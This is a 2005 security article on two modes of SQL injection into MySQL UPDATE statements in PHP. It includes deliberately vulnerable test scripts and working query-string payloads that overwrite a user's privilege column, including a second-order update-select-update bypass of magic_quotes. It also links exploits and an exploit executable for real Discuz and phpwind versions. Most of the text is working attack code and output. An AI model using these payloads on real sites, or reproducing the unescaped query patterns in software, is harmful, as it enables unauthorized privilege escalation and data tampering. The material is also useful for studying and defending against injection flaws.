Two UPDATE injection modes (mysql + php)
By: SuperHei (Security Angel, 4ngel.net), 2005.8.11
I. Test environment:
OS: Windows XP SP2
PHP: 4.3.10
MySQL: 4.1.9
Apache: 1.3.33
II. Test database structure:
----- Start -----
--
-- Database: `test`
--
----------------------------------------------------------
--
-- Table structure for table `userinfo`
--
CREATE TABLE `userinfo` (
  `groudid` varchar(12) NOT NULL default '1',
  `user` varchar(12) NOT NULL default 'gigie',
  `pass` varchar(122) NOT NULL default '123'
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--
-- Dumping data for table `userinfo`
--
INSERT INTO `userinfo` VALUES ('2', 'heige', '20140901');
------ End -------
III. Test modes:
1. The variable is not enclosed in ' or " [MOD1]
<?php
// test1.php  Mod1
// $p arrives from the query string (register_globals, as in the original setup)
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname     = "test";
mysql_connect($servername, $dbusername, $dbpassword) or die("database connection failed");
$sql = "update userinfo set pass=$p where user='heige'";   // <-- $p is NOT wrapped in single quotes
$result = mysql_db_query($dbname, $sql);
echo "<p>SQL Query: $sql<p>";
?>
The script is only meant to change the pass of user='heige'. If groudid is the user's privilege level, our goal is to change groudid by constructing $p.
So we submit: http://127.0.0.1/test1.php?p=123456,groudid=1
The statement becomes: update userinfo set pass=123456,groudid=1 where user='heige'
Query in mysql:
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user  | pass   |
+---------+-------+--------+
| 1       | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)
The groudid of user heige has been changed from 2 to 1.
So we get an UPDATE injection even without ' or ". This is our mode 1.
2. The variable is enclosed in ' or " [MOD2]
<?php
// test2.php
// $p arrives from the query string (register_globals, as in the original setup)
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname     = "test";
mysql_connect($servername, $dbusername, $dbpassword) or die("database connection failed");
$sql = "update userinfo set pass='$p' where user='heige'";   // <-- $p IS wrapped in single quotes
$result = mysql_db_query($dbname, $sql);
echo "<p>SQL Query: $sql<p>";
?>
To close the quote, $p should be constructed as 123456',groudid='1 and submitted as:
http://127.0.0.1/test2.php?p=123456',groudid='1
With magic_quotes_gpc=On, every ' is turned into \', so the submitted statement becomes:
SQL Query: update userinfo set pass='123456\',groudid=\'1' where user='heige'
Query in mysql:
mysql> select * from userinfo;
+---------+-------+--------------------+
| groudid | user  | pass               |
+---------+-------+--------------------+
| 2       | heige | 123456',groudid='1 |
+---------+-------+--------------------+
1 row in set (0.00 sec)
groudid is not modified; the whole payload was stored as a string (note that the backslashes are gone, the quotes are not). So when the variable is enclosed in ' or ", is injection completely impossible? Look at mode 2 below:
<?php
// test3.php  Mod2
// $p arrives from the query string (register_globals, as in the original setup)
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname     = "test";
mysql_connect($servername, $dbusername, $dbpassword) or die("database connection failed");
// step 1: write $p (escaped by magic_quotes_gpc) into the database
$sql = "update userinfo set pass='$p' where user='heige'";   // <-- $p IS wrapped in single quotes
mysql_db_query($dbname, $sql);
// step 2: read the stored pass back; the escaping backslashes were consumed by the first query
$sql = "select pass from userinfo where user='heige'";
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo $userinfo[0];   // the stored pass, now in $userinfo[0]
// step 3: update again with the stored value, which is interpolated without any escaping
$sql = "update userinfo set pass='$userinfo[0]' where user='heige'";
mysql_db_query($dbname, $sql);
?>
In our test we submit: http://127.0.0.1/test3.php?p=123456',groudid='1
The third query becomes: update userinfo set pass='123456',groudid='1' where user='heige'
Back in mysql:
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user  | pass   |
+---------+-------+--------+
| 1       | heige | 123456 |
+---------+-------+--------+
1 row in set (0.00 sec)
HaHa~~ groudid has been changed to 1; the injection succeeded. This is our mode 2, which can be summarized as:
update --> select --> update
IV. Real-world cases
Mode 1: Discuz 2.0/2.2 register.php injection
Vulnerability analysis: http://4ngel.net/article/41.htm
Discuz 2.0/2.2 register.php remote exploit: http://4ngel.net/project/discuz_reg.htm
Mode 2: phpwind 2.0.2 and 3.31e privilege escalation vulnerability
Vulnerability analysis:
update (profile.php: the injected variable ends up in the $proicon update statement, icon='$userdb[icon]') --> select (jop.php) --> update (jop.php)
Exploit: http://www.huij.net/9xiao/up/phpwind-exploit.exe
V. Thanks
Special thanks to saiy and other friends for their discussion and help. Thanks!!!